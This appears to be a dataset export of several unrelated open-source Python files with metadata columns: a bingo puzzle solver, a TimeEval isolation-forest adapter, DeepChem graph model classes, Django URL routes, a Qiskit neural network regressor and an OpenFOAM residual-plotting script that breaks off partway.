:return: Puzzle input text file as list
:rtype: list
"""
file = open("puzzle-input", "r")
string_list = file.read().splitlines()
file.close()
return string_list
def play_bingo(bingo_cards: list) -> list:
"""
Extract winning numbers, bingo boards from input.
Make a separate 2D list tracking wins.
For each winning number, check every board row and column for a match.
Add matches to the 2D list tracking wins.
Once done, check 2D list for winning columns / rows.
Add winning boards to new list along with winning number.
Multiply to get score.
:param bingo_cards: puzzle input where each line is a string
:return: First and last winning board score
:rtype: list
"""
winning_numbers = [int(x) for x in bingo_cards[0].split(",")]
logger.debug(f" Winning numbers: {winning_numbers}")
single_board = []
all_boards = []
final_score_list = []
# Get Bingo Boards
for line in range(len(bingo_cards)):
if "," not in bingo_cards[line]:
row = [int(x) for x in bingo_cards[line].split()]
if row:
logger.debug(row)
single_board.append(row)
elif single_board:
all_boards.append(single_board)
single_board = []
# Set up separate 2D list tracking matches to winning numbers.
unmarked_tracker = []
for board in all_boards:
assert len(board) == 5 and len(board[0]) == 5
unmarked_tracker.append([[False for _ in range(5)] for _ in range(5)])
# Set up list to track winning boards.
winning_board = [False for _ in range(len(all_boards))]
for number in winning_numbers:
for index, board in enumerate(all_boards):
logger.debug(f"Checking board: {index} for {number}")
# Check for winning numbers.
for row in range(5):
for column in range(5):
if board[row][column] == number:
logger.debug(f"{unmarked_tracker[index][row][column]} "
f"is True.")
unmarked_tracker[index][row][column] = True
# Check for 5 in a row.
won = False
for row in range(5):
ok = True
for column in range(5):
if not unmarked_tracker[index][row][column]:
ok = False
if ok:
won = True
# Check for 5 in a column.
for column in range(5):
ok = True
for row in range(5):
if not unmarked_tracker[index][row][column]:
ok = False
if ok:
won = True
# Check for each winning board.
if won and not winning_board[index]:
winning_board[index] = True
winning_boards_count = len([j for j in range(len(all_boards))
if winning_board[j]])
# If first or last board.
if winning_boards_count == 1 or winning_boards_count == \
len(all_boards):
# Calculate all unmarked.
unmarked = 0
for row in range(5):
for column in range(5):
if not unmarked_tracker[index][row][column]:
unmarked += board[row][column]
final_score_list.append(unmarked * number)
logger.debug(f"The final score is: {final_score_list[-1]}, "
f"which is {unmarked} * {number}.")
return final_score_list
if __name__ == "__main__":
main() | en | 0.845976 | Day 04 Import the puzzle input, process and display the results. Import the puzzle input and return a list. :return: Puzzle input text file as list :rtype: list Extract winning numbers, bingo boards from input. Make a separate 2D list tracking wins. For each winning number, check every board row and column for a match. Add matches to the 2D list tracking wins. Once done, check 2D list for winning columns / rows. Add winning boards to new list along with winning number. Multiply to get score. :param bingo_cards: puzzle input where each line is a string :return: First and last winning board score :rtype: list # Get Bingo Boards # Set up separate 2D list tracking matches to winning numbers. # Set up list to track winning boards. # Check for winning numbers. # Check for 5 in a row. # Check for 5 in a column. # Check for each winning board. # If first or last board. # Calculate all unmarked. | 3.851394 | 4 |
timeeval_experiments/algorithms/eif.py | HPI-Information-Systems/TimeEval | 2 | 8577 | from durations import Duration
from typing import Any, Dict, Optional
from timeeval import Algorithm, TrainingType, InputDimensionality
from timeeval.adapters import DockerAdapter
from timeeval.params import ParameterConfig
_eif_parameters: Dict[str, Dict[str, Any]] = {
"extension_level": {
"defaultValue": None,
"description": "Extension level 0 resembles standard isolation forest. If unspecified (`None`), then `extension_level=X.shape[1] - 1`.",
"name": "extension_level",
"type": "int"
},
"limit": {
"defaultValue": None,
"description": "The maximum allowed tree depth. This is by default set to average length of unsucessful search in a binary tree.",
"name": "limit",
"type": "int"
},
"max_samples": {
"defaultValue": None,
"description": "The number of samples to draw from X to train each base estimator: `max_samples * X.shape[0]`. If unspecified (`None`), then `max_samples=min(256, X.shape[0])`.",
"name": "max_samples",
"type": "float"
},
"n_trees": {
"defaultValue": 200,
"description": "The number of decision trees (base estimators) in the forest (ensemble).",
"name": "n_trees",
"type": "int"
},
"random_state": {
"defaultValue": 42,
"description": "Seed for random number generation.",
"name": "random_state",
"type": "int"
}
}
def eif(params: ParameterConfig = None, skip_pull: bool = False, timeout: Optional[Duration] = None) -> Algorithm:
return Algorithm(
name="Extended Isolation Forest (EIF)",
main=DockerAdapter(
image_name="registry.gitlab.hpi.de/akita/i/eif",
skip_pull=skip_pull,
timeout=timeout,
group_privileges="akita",
),
preprocess=None,
postprocess=None,
param_schema=_eif_parameters,
param_config=params or ParameterConfig.defaults(),
data_as_file=True,
training_type=TrainingType.UNSUPERVISED,
input_dimensionality=InputDimensionality("multivariate")
)
| from durations import Duration
from typing import Any, Dict, Optional
from timeeval import Algorithm, TrainingType, InputDimensionality
from timeeval.adapters import DockerAdapter
from timeeval.params import ParameterConfig
_eif_parameters: Dict[str, Dict[str, Any]] = {
"extension_level": {
"defaultValue": None,
"description": "Extension level 0 resembles standard isolation forest. If unspecified (`None`), then `extension_level=X.shape[1] - 1`.",
"name": "extension_level",
"type": "int"
},
"limit": {
"defaultValue": None,
"description": "The maximum allowed tree depth. This is by default set to average length of unsucessful search in a binary tree.",
"name": "limit",
"type": "int"
},
"max_samples": {
"defaultValue": None,
"description": "The number of samples to draw from X to train each base estimator: `max_samples * X.shape[0]`. If unspecified (`None`), then `max_samples=min(256, X.shape[0])`.",
"name": "max_samples",
"type": "float"
},
"n_trees": {
"defaultValue": 200,
"description": "The number of decision trees (base estimators) in the forest (ensemble).",
"name": "n_trees",
"type": "int"
},
"random_state": {
"defaultValue": 42,
"description": "Seed for random number generation.",
"name": "random_state",
"type": "int"
}
}
def eif(params: ParameterConfig = None, skip_pull: bool = False, timeout: Optional[Duration] = None) -> Algorithm:
return Algorithm(
name="Extended Isolation Forest (EIF)",
main=DockerAdapter(
image_name="registry.gitlab.hpi.de/akita/i/eif",
skip_pull=skip_pull,
timeout=timeout,
group_privileges="akita",
),
preprocess=None,
postprocess=None,
param_schema=_eif_parameters,
param_config=params or ParameterConfig.defaults(),
data_as_file=True,
training_type=TrainingType.UNSUPERVISED,
input_dimensionality=InputDimensionality("multivariate")
)
| none | 1 | 2.235755 | 2 |
|
deepchem/models/tf_new_models/graph_models.py | KEHANG/deepchem | 0 | 8578 | """
Convenience classes for assembling graph models.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
__author__ = "<NAME> and <NAME>"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "MIT"
import tensorflow as tf
from deepchem.nn.layers import GraphGather
from deepchem.models.tf_new_models.graph_topology import GraphTopology
class SequentialGraph(object):
"""An analog of Keras Sequential class for Graph data.
Like the Sequential class from Keras, but automatically passes topology
placeholders from GraphTopology to each graph layer (from layers) added
to the network. Non graph layers don't get the extra placeholders.
"""
def __init__(self, n_feat):
"""
Parameters
----------
n_feat: int
Number of features per atom.
"""
self.graph = tf.Graph()
with self.graph.as_default():
self.graph_topology = GraphTopology(n_feat)
self.output = self.graph_topology.get_atom_features_placeholder()
# Keep track of the layers
self.layers = []
def add(self, layer):
"""Adds a new layer to model."""
with self.graph.as_default():
############################################# DEBUG
#print("start - add()")
#print("self.output")
#print(self.output)
############################################# DEBUG
# For graphical layers, add connectivity placeholders
if type(layer).__name__ in ['GraphConv', 'GraphGather', 'GraphPool']:
if (len(self.layers) > 0 and hasattr(self.layers[-1], "__name__")):
assert self.layers[-1].__name__ != "GraphGather", \
'Cannot use GraphConv or GraphGather layers after a GraphGather'
self.output = layer([self.output] +
self.graph_topology.get_topology_placeholders())
else:
self.output = layer(self.output)
############################################# DEBUG
#print("end- add()")
#print("self.output")
#print(self.output)
############################################# DEBUG
# Add layer to the layer list
self.layers.append(layer)
def get_graph_topology(self):
return self.graph_topology
def get_num_output_features(self):
"""Gets the output shape of the featurization layers of the network"""
return self.layers[-1].output_shape[1]
def return_outputs(self):
return self.output
def return_inputs(self):
return self.graph_topology.get_input_placeholders()
def get_layer(self, layer_id):
return self.layers[layer_id]
class SequentialSupportGraph(object):
"""An analog of Keras Sequential model for test/support models."""
def __init__(self, n_feat):
"""
Parameters
----------
n_feat: int
Number of atomic features.
"""
self.graph = tf.Graph()
with self.graph.as_default():
# Create graph topology and x
self.test_graph_topology = GraphTopology(n_feat, name='test')
self.support_graph_topology = GraphTopology(n_feat, name='support')
self.test = self.test_graph_topology.get_atom_features_placeholder()
self.support = self.support_graph_topology.get_atom_features_placeholder()
# Keep track of the layers
self.layers = []
# Whether or not we have used the GraphGather layer yet
self.bool_pre_gather = True
def add(self, layer):
"""Adds a layer to both test/support stacks.
Note that the layer transformation is performed independently on the
test/support tensors.
"""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphGather', 'GraphPool']:
assert self.bool_pre_gather, "Cannot apply graphical layers after gather."
self.test = layer([self.test] + self.test_graph_topology.topology)
self.support = layer([self.support] +
self.support_graph_topology.topology)
else:
self.test = layer(self.test)
self.support = layer(self.support)
if type(layer).__name__ == 'GraphGather':
self.bool_pre_gather = False # Set flag to stop adding topology
def add_test(self, layer):
"""Adds a layer to test."""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphPool', 'GraphGather']:
self.test = layer([self.test] + self.test_graph_topology.topology)
else:
self.test = layer(self.test)
def add_support(self, layer):
"""Adds a layer to support."""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphPool', 'GraphGather']:
self.support = layer([self.support] +
self.support_graph_topology.topology)
else:
self.support = layer(self.support)
def join(self, layer):
"""Joins test and support to a two input two output layer"""
with self.graph.as_default():
self.layers.append(layer)
self.test, self.support = layer([self.test, self.support])
def get_test_output(self):
return self.test
def get_support_output(self):
return self.support
def return_outputs(self):
return [self.test] + [self.support]
def return_inputs(self):
return (self.test_graph_topology.get_inputs() +
self.support_graph_topology.get_inputs())
| """
Convenience classes for assembling graph models.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
__author__ = "<NAME> and <NAME>"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "MIT"
import tensorflow as tf
from deepchem.nn.layers import GraphGather
from deepchem.models.tf_new_models.graph_topology import GraphTopology
class SequentialGraph(object):
"""An analog of Keras Sequential class for Graph data.
Like the Sequential class from Keras, but automatically passes topology
placeholders from GraphTopology to each graph layer (from layers) added
to the network. Non graph layers don't get the extra placeholders.
"""
def __init__(self, n_feat):
"""
Parameters
----------
n_feat: int
Number of features per atom.
"""
self.graph = tf.Graph()
with self.graph.as_default():
self.graph_topology = GraphTopology(n_feat)
self.output = self.graph_topology.get_atom_features_placeholder()
# Keep track of the layers
self.layers = []
def add(self, layer):
"""Adds a new layer to model."""
with self.graph.as_default():
############################################# DEBUG
#print("start - add()")
#print("self.output")
#print(self.output)
############################################# DEBUG
# For graphical layers, add connectivity placeholders
if type(layer).__name__ in ['GraphConv', 'GraphGather', 'GraphPool']:
if (len(self.layers) > 0 and hasattr(self.layers[-1], "__name__")):
assert self.layers[-1].__name__ != "GraphGather", \
'Cannot use GraphConv or GraphGather layers after a GraphGather'
self.output = layer([self.output] +
self.graph_topology.get_topology_placeholders())
else:
self.output = layer(self.output)
############################################# DEBUG
#print("end- add()")
#print("self.output")
#print(self.output)
############################################# DEBUG
# Add layer to the layer list
self.layers.append(layer)
def get_graph_topology(self):
return self.graph_topology
def get_num_output_features(self):
"""Gets the output shape of the featurization layers of the network"""
return self.layers[-1].output_shape[1]
def return_outputs(self):
return self.output
def return_inputs(self):
return self.graph_topology.get_input_placeholders()
def get_layer(self, layer_id):
return self.layers[layer_id]
class SequentialSupportGraph(object):
"""An analog of Keras Sequential model for test/support models."""
def __init__(self, n_feat):
"""
Parameters
----------
n_feat: int
Number of atomic features.
"""
self.graph = tf.Graph()
with self.graph.as_default():
# Create graph topology and x
self.test_graph_topology = GraphTopology(n_feat, name='test')
self.support_graph_topology = GraphTopology(n_feat, name='support')
self.test = self.test_graph_topology.get_atom_features_placeholder()
self.support = self.support_graph_topology.get_atom_features_placeholder()
# Keep track of the layers
self.layers = []
# Whether or not we have used the GraphGather layer yet
self.bool_pre_gather = True
def add(self, layer):
"""Adds a layer to both test/support stacks.
Note that the layer transformation is performed independently on the
test/support tensors.
"""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphGather', 'GraphPool']:
assert self.bool_pre_gather, "Cannot apply graphical layers after gather."
self.test = layer([self.test] + self.test_graph_topology.topology)
self.support = layer([self.support] +
self.support_graph_topology.topology)
else:
self.test = layer(self.test)
self.support = layer(self.support)
if type(layer).__name__ == 'GraphGather':
self.bool_pre_gather = False # Set flag to stop adding topology
def add_test(self, layer):
"""Adds a layer to test."""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphPool', 'GraphGather']:
self.test = layer([self.test] + self.test_graph_topology.topology)
else:
self.test = layer(self.test)
def add_support(self, layer):
"""Adds a layer to support."""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphPool', 'GraphGather']:
self.support = layer([self.support] +
self.support_graph_topology.topology)
else:
self.support = layer(self.support)
def join(self, layer):
"""Joins test and support to a two input two output layer"""
with self.graph.as_default():
self.layers.append(layer)
self.test, self.support = layer([self.test, self.support])
def get_test_output(self):
return self.test
def get_support_output(self):
return self.support
def return_outputs(self):
return [self.test] + [self.support]
def return_inputs(self):
return (self.test_graph_topology.get_inputs() +
self.support_graph_topology.get_inputs())
| en | 0.565884 | Convenience classes for assembling graph models. An analog of Keras Sequential class for Graph data. Like the Sequential class from Keras, but automatically passes topology placeholders from GraphTopology to each graph layer (from layers) added to the network. Non graph layers don't get the extra placeholders. Parameters ---------- n_feat: int Number of features per atom. # Keep track of the layers Adds a new layer to model. ############################################# DEBUG #print("start - add()") #print("self.output") #print(self.output) ############################################# DEBUG # For graphical layers, add connectivity placeholders ############################################# DEBUG #print("end- add()") #print("self.output") #print(self.output) ############################################# DEBUG # Add layer to the layer list Gets the output shape of the featurization layers of the network An analog of Keras Sequential model for test/support models. Parameters ---------- n_feat: int Number of atomic features. # Create graph topology and x # Keep track of the layers # Whether or not we have used the GraphGather layer yet Adds a layer to both test/support stacks. Note that the layer transformation is performed independently on the test/support tensors. # Update new value of x # Set flag to stop adding topology Adds a layer to test. # Update new value of x Adds a layer to support. # Update new value of x Joins test and support to a two input two output layer | 3.055378 | 3 |
questionbank/users/urls.py | SyafiqTermizi/questionbank | 1 | 8579 | <filename>questionbank/users/urls.py
from django.urls import path
from .views import (
UserListView, UserUpdateView, UserProfileView, UserDeleteView,
AcceptInvitationView, SpecialtyListView, SpecialtyCreateView, SpecialtyUpdateView,
SpecialtyDeleteView
)
app_name = 'users'
urlpatterns = [
path('', UserListView.as_view(), name='list'),
path('<int:pk>/', UserUpdateView.as_view(), name='update'),
path('<int:pk>/delete/', UserDeleteView.as_view(), name='delete'),
path('profile/', UserProfileView.as_view(), name='profile'),
path(
'invite/<str:token>/', AcceptInvitationView.as_view(),
name='accept_invite'
),
path('specialties/', SpecialtyListView.as_view(), name='specialty_list'),
path('specialties/create/', SpecialtyCreateView.as_view(), name='specialty_create'),
path('specialties/<int:pk>/update/', SpecialtyUpdateView.as_view(), name='specialty_update'),
path('specialties/<int:pk>/delete/', SpecialtyDeleteView.as_view(), name='specialty_delete')
]
| <filename>questionbank/users/urls.py
from django.urls import path
from .views import (
UserListView, UserUpdateView, UserProfileView, UserDeleteView,
AcceptInvitationView, SpecialtyListView, SpecialtyCreateView, SpecialtyUpdateView,
SpecialtyDeleteView
)
app_name = 'users'
urlpatterns = [
path('', UserListView.as_view(), name='list'),
path('<int:pk>/', UserUpdateView.as_view(), name='update'),
path('<int:pk>/delete/', UserDeleteView.as_view(), name='delete'),
path('profile/', UserProfileView.as_view(), name='profile'),
path(
'invite/<str:token>/', AcceptInvitationView.as_view(),
name='accept_invite'
),
path('specialties/', SpecialtyListView.as_view(), name='specialty_list'),
path('specialties/create/', SpecialtyCreateView.as_view(), name='specialty_create'),
path('specialties/<int:pk>/update/', SpecialtyUpdateView.as_view(), name='specialty_update'),
path('specialties/<int:pk>/delete/', SpecialtyDeleteView.as_view(), name='specialty_delete')
]
| none | 1 | 2.063076 | 2 |
|
qiskit_machine_learning/algorithms/regressors/neural_network_regressor.py | Zoufalc/qiskit-machine-learning | 1 | 8580 | <reponame>Zoufalc/qiskit-machine-learning<filename>qiskit_machine_learning/algorithms/regressors/neural_network_regressor.py
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Neural network regressor """
from typing import Union
import numpy as np
from qiskit.algorithms.optimizers import Optimizer
from ...exceptions import QiskitMachineLearningError
from ...neural_networks import NeuralNetwork
from ...utils.loss_functions import (Loss, L1Loss, L2Loss, CrossEntropyLoss,
CrossEntropySigmoidLoss)
class NeuralNetworkRegressor:
""" Quantum neural network regressor"""
def __init__(self, neural_network: NeuralNetwork,
loss: Union[str, Loss] = 'l2',
optimizer: Optimizer = None,
warm_start: bool = False):
"""
Args:
neural_network: An instance of an quantum neural network. If the neural network has a
one-dimensional output, i.e., `neural_network.output_shape=(1,)`, then it is
expected to return values in [-1, +1] and it can only be used for binary
classification. If the output is multi-dimensional, it is assumed that the result
is a probability distribution, i.e., that the entries are non-negative and sum up
to one. Then there are two options, either one-hot encoding or not. In case of
one-hot encoding, each probability vector resulting a neural network is considered
as one sample and the loss function is applied to the whole vector. Otherwise, each
entry of the probability vector is considered as an individual sample and the loss
function is applied to the index and weighted with the corresponding probability.
loss: A target loss function to be used in training. Default is `l2`, i.e. L2 loss.
Can be given either as a string for 'l1', 'l2', 'cross_entropy',
'cross_entropy_sigmoid', or as a loss function implementing the Loss interface.
optimizer: An instance of an optimizer to be used in training.
warm_start: Use weights from previous fit to start next fit.
Raises:
QiskitMachineLearningError: unknown loss, invalid neural network
"""
self._neural_network = neural_network
if len(neural_network.output_shape) > 1:
raise QiskitMachineLearningError('Invalid neural network output shape!')
if isinstance(loss, Loss):
self._loss = loss
else:
if loss.lower() == 'l1':
self._loss = L1Loss()
elif loss.lower() == 'l2':
self._loss = L2Loss()
elif loss.lower() == 'cross_entropy':
self._loss = CrossEntropyLoss()
elif loss.lower() == 'cross_entropy_sigmoid':
self._loss = CrossEntropySigmoidLoss()
else:
raise QiskitMachineLearningError(f'Unknown loss {loss}!')
self._optimizer = optimizer
self._warm_start = warm_start
self._fit_result = None
@property
def neural_network(self):
""" Returns the underlying neural network."""
return self._neural_network
@property
def loss(self):
""" Returns the underlying neural network."""
return self._loss
@property
def warm_start(self) -> bool:
""" Returns the warm start flag."""
return self._warm_start
@warm_start.setter
def warm_start(self, warm_start: bool) -> None:
""" Sets the warm start flag."""
self._warm_start = warm_start
def fit(self, X: np.ndarray, y: np.ndarray): # pylint: disable=invalid-name
"""
Fit the model to data matrix X and target(s) y.
Args:
X: The input data.
y: The target values.
Returns:
self: returns a trained classifier.
Raises:
QiskitMachineLearningError: In case of invalid data (e.g. incompatible with network)
"""
if self._neural_network.output_shape == (1,):
# TODO: we should add some reasonable compatibility checks and raise meaningful errors.
def objective(w):
predict = self._neural_network.forward(X, w)
target = np.array(y).reshape(predict.shape)
value = np.sum(self._loss(predict, target))
return value
def objective_grad(w):
# TODO should store output from forward pass (implement loss interface?)
# TODO: need to be able to turn off input grads if not needed.
output = self._neural_network.forward(X, w)
_, weights_grad = self._neural_network.backward(X, w)
grad = np.zeros((1, self._neural_network.num_weights))
for i in range(len(X)):
grad += self._loss.gradient(output[i][0], y[i]) * weights_grad[i]
return grad
else:
def objective(w):
val = 0.0
probs = self._neural_network.forward(X, w)
for i in range(len(X)):
for y_predict, prob in enumerate(probs[i]):
val += prob * self._loss(y_predict, y[i])
return val
def objective_grad(w):
num_classes = self._neural_network.output_shape[0]
grad = np.zeros((1, self._neural_network.num_weights))
for x, y_target in zip(X, y):
# TODO: do batch eval
_, weight_prob_grad = self._neural_network.backward(x, w)
for i in range(num_classes):
grad += weight_prob_grad[
0, i, :].reshape(grad.shape) * self._loss(i, y_target)
return grad
if self._warm_start and self._fit_result is not None:
initial_point = self._fit_result[0]
else:
initial_point = np.random.rand(self._neural_network.num_weights)
self._fit_result = self._optimizer.optimize(self._neural_network.num_weights, objective,
objective_grad, initial_point=initial_point)
return self
def predict(self, X: np.ndarray) -> np.ndarray: # pylint: disable=invalid-name
"""
Predict using the network specified to the regression.
Args:
X: The input data.
Raises:
QiskitMachineLearningError: Model needs to be fit to some training data first
Returns:
The predicted values.
"""
if self._fit_result is None:
raise QiskitMachineLearningError('Model needs to be fit to some training data first!')
# TODO: proper handling of batching
return self._neural_network.forward(X, self._fit_result[0])
def score(self, X: np.ndarray, y: np.ndarray) -> int: # pylint: disable=invalid-name
"""
Return R-squared on the given test data and targeted values.
Args:
X: Test samples.
y: True target values given `X`.
Raises:
QiskitMachineLearningError: Model needs to be fit to some training data first
Returns:
R-squared value.
"""
if self._fit_result is None:
raise QiskitMachineLearningError('Model needs to be fit to some training data first!')
predict = self.predict(X)
# Compute R2 for score
ss_res = sum(map(lambda k: (k[0] - k[1]) ** 2, zip(y, predict)))
ss_tot = sum([(k - np.mean(y)) ** 2 for k in y])
score = 1 - (ss_res / ss_tot)
if len(np.array(score).shape) > 0:
return score[0]
else:
return score
| # This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Neural network regressor """
from typing import Union
import numpy as np
from qiskit.algorithms.optimizers import Optimizer
from ...exceptions import QiskitMachineLearningError
from ...neural_networks import NeuralNetwork
from ...utils.loss_functions import (Loss, L1Loss, L2Loss, CrossEntropyLoss,
CrossEntropySigmoidLoss)
class NeuralNetworkRegressor:
""" Quantum neural network regressor"""
def __init__(self, neural_network: NeuralNetwork,
loss: Union[str, Loss] = 'l2',
optimizer: Optimizer = None,
warm_start: bool = False):
"""
Args:
neural_network: An instance of an quantum neural network. If the neural network has a
one-dimensional output, i.e., `neural_network.output_shape=(1,)`, then it is
expected to return values in [-1, +1] and it can only be used for binary
classification. If the output is multi-dimensional, it is assumed that the result
is a probability distribution, i.e., that the entries are non-negative and sum up
to one. Then there are two options, either one-hot encoding or not. In case of
one-hot encoding, each probability vector resulting a neural network is considered
as one sample and the loss function is applied to the whole vector. Otherwise, each
entry of the probability vector is considered as an individual sample and the loss
function is applied to the index and weighted with the corresponding probability.
loss: A target loss function to be used in training. Default is `l2`, i.e. L2 loss.
Can be given either as a string for 'l1', 'l2', 'cross_entropy',
'cross_entropy_sigmoid', or as a loss function implementing the Loss interface.
optimizer: An instance of an optimizer to be used in training.
warm_start: Use weights from previous fit to start next fit.
Raises:
QiskitMachineLearningError: unknown loss, invalid neural network
"""
self._neural_network = neural_network
if len(neural_network.output_shape) > 1:
raise QiskitMachineLearningError('Invalid neural network output shape!')
if isinstance(loss, Loss):
self._loss = loss
else:
if loss.lower() == 'l1':
self._loss = L1Loss()
elif loss.lower() == 'l2':
self._loss = L2Loss()
elif loss.lower() == 'cross_entropy':
self._loss = CrossEntropyLoss()
elif loss.lower() == 'cross_entropy_sigmoid':
self._loss = CrossEntropySigmoidLoss()
else:
raise QiskitMachineLearningError(f'Unknown loss {loss}!')
self._optimizer = optimizer
self._warm_start = warm_start
self._fit_result = None
@property
def neural_network(self):
""" Returns the underlying neural network."""
return self._neural_network
@property
def loss(self):
""" Returns the underlying neural network."""
return self._loss
@property
def warm_start(self) -> bool:
""" Returns the warm start flag."""
return self._warm_start
@warm_start.setter
def warm_start(self, warm_start: bool) -> None:
""" Sets the warm start flag."""
self._warm_start = warm_start
def fit(self, X: np.ndarray, y: np.ndarray): # pylint: disable=invalid-name
"""
Fit the model to data matrix X and target(s) y.
Args:
X: The input data.
y: The target values.
Returns:
self: returns a trained classifier.
Raises:
QiskitMachineLearningError: In case of invalid data (e.g. incompatible with network)
"""
if self._neural_network.output_shape == (1,):
# TODO: we should add some reasonable compatibility checks and raise meaningful errors.
def objective(w):
predict = self._neural_network.forward(X, w)
target = np.array(y).reshape(predict.shape)
value = np.sum(self._loss(predict, target))
return value
def objective_grad(w):
# TODO should store output from forward pass (implement loss interface?)
# TODO: need to be able to turn off input grads if not needed.
output = self._neural_network.forward(X, w)
_, weights_grad = self._neural_network.backward(X, w)
grad = np.zeros((1, self._neural_network.num_weights))
for i in range(len(X)):
grad += self._loss.gradient(output[i][0], y[i]) * weights_grad[i]
return grad
else:
def objective(w):
val = 0.0
probs = self._neural_network.forward(X, w)
for i in range(len(X)):
for y_predict, prob in enumerate(probs[i]):
val += prob * self._loss(y_predict, y[i])
return val
def objective_grad(w):
num_classes = self._neural_network.output_shape[0]
grad = np.zeros((1, self._neural_network.num_weights))
for x, y_target in zip(X, y):
# TODO: do batch eval
_, weight_prob_grad = self._neural_network.backward(x, w)
for i in range(num_classes):
grad += weight_prob_grad[
0, i, :].reshape(grad.shape) * self._loss(i, y_target)
return grad
if self._warm_start and self._fit_result is not None:
initial_point = self._fit_result[0]
else:
initial_point = np.random.rand(self._neural_network.num_weights)
self._fit_result = self._optimizer.optimize(self._neural_network.num_weights, objective,
objective_grad, initial_point=initial_point)
return self
def predict(self, X: np.ndarray) -> np.ndarray: # pylint: disable=invalid-name
"""
Predict using the network specified to the regression.
Args:
X: The input data.
Raises:
QiskitMachineLearningError: Model needs to be fit to some training data first
Returns:
The predicted values.
"""
if self._fit_result is None:
raise QiskitMachineLearningError('Model needs to be fit to some training data first!')
# TODO: proper handling of batching
return self._neural_network.forward(X, self._fit_result[0])
def score(self, X: np.ndarray, y: np.ndarray) -> int: # pylint: disable=invalid-name
"""
Return R-squared on the given test data and targeted values.
Args:
X: Test samples.
y: True target values given `X`.
Raises:
QiskitMachineLearningError: Model needs to be fit to some training data first
Returns:
R-squared value.
"""
if self._fit_result is None:
raise QiskitMachineLearningError('Model needs to be fit to some training data first!')
predict = self.predict(X)
# Compute R2 for score
ss_res = sum(map(lambda k: (k[0] - k[1]) ** 2, zip(y, predict)))
ss_tot = sum([(k - np.mean(y)) ** 2 for k in y])
score = 1 - (ss_res / ss_tot)
if len(np.array(score).shape) > 0:
return score[0]
else:
return score | en | 0.796665 | # This code is part of Qiskit. # # (C) Copyright IBM 2021. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. Neural network regressor Quantum neural network regressor Args: neural_network: An instance of an quantum neural network. If the neural network has a one-dimensional output, i.e., `neural_network.output_shape=(1,)`, then it is expected to return values in [-1, +1] and it can only be used for binary classification. If the output is multi-dimensional, it is assumed that the result is a probability distribution, i.e., that the entries are non-negative and sum up to one. Then there are two options, either one-hot encoding or not. In case of one-hot encoding, each probability vector resulting a neural network is considered as one sample and the loss function is applied to the whole vector. Otherwise, each entry of the probability vector is considered as an individual sample and the loss function is applied to the index and weighted with the corresponding probability. loss: A target loss function to be used in training. Default is `l2`, i.e. L2 loss. Can be given either as a string for 'l1', 'l2', 'cross_entropy', 'cross_entropy_sigmoid', or as a loss function implementing the Loss interface. optimizer: An instance of an optimizer to be used in training. warm_start: Use weights from previous fit to start next fit. Raises: QiskitMachineLearningError: unknown loss, invalid neural network Returns the underlying neural network. Returns the underlying neural network. Returns the warm start flag. Sets the warm start flag. # pylint: disable=invalid-name Fit the model to data matrix X and target(s) y. Args: X: The input data. y: The target values. Returns: self: returns a trained classifier. Raises: QiskitMachineLearningError: In case of invalid data (e.g. incompatible with network) # TODO: we should add some reasonable compatibility checks and raise meaningful errors. # TODO should store output from forward pass (implement loss interface?) # TODO: need to be able to turn off input grads if not needed. # TODO: do batch eval # pylint: disable=invalid-name Predict using the network specified to the regression. Args: X: The input data. Raises: QiskitMachineLearningError: Model needs to be fit to some training data first Returns: The predicted values. # TODO: proper handling of batching # pylint: disable=invalid-name Return R-squared on the given test data and targeted values. Args: X: Test samples. y: True target values given `X`. Raises: QiskitMachineLearningError: Model needs to be fit to some training data first Returns: R-squared value. # Compute R2 for score | 3.411709 | 3 |
residuals.py | fbob/mplFOAM | 8 | 8581 | <gh_stars>1-10
#!/usr/bin/env python
# encoding: utf-8
import sys
import getopt
import re
import os
import pylab as plt
import numpy as np
# Define the variables for which the residuals will be plotted
variables = ["Ux", "Uy", "T", "p_rgh", "k", "epsilon"]
# Get the arguments of the script
def usage():
print("Usage: residuals.py -l logfile\nPlot the residuals versus Time/Iteration")
try:
options, args = getopt.getopt(sys.argv[1:], 'l:h', ['help', 'logfile='])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in options:
if opt in ("-l", "--logfile"):
log_file = arg
elif opt in ("-h", "--help"):
usage()
sys.exit(1)
# Get the lines of the logfile 'log_file'
lines = open(log_file, "r" ).readlines()
# Get the time and continuity values
time = [] # Time(s) or iterations counter
continuity = [] # Continuity values
for line in lines:
if re.search(r"^Time = ", line): # Search for string 'Time' at the begining of the line in file
start = 'Time = '
value = line.split(start)[1] # Take the Time value as the string just after start
time.append(np.float(value)) # Transform the string in a float value
elif re.search(r"continuity errors :", line): # Search for string 'continuity' in the lines of file 'log_file'
start = 'sum local = '
end = ', global'
value = line.split(start)[1].split(end)[0] # Take the continuity value as string between start and end
continuity.append(np.float(value)) # Transform the string in a float value
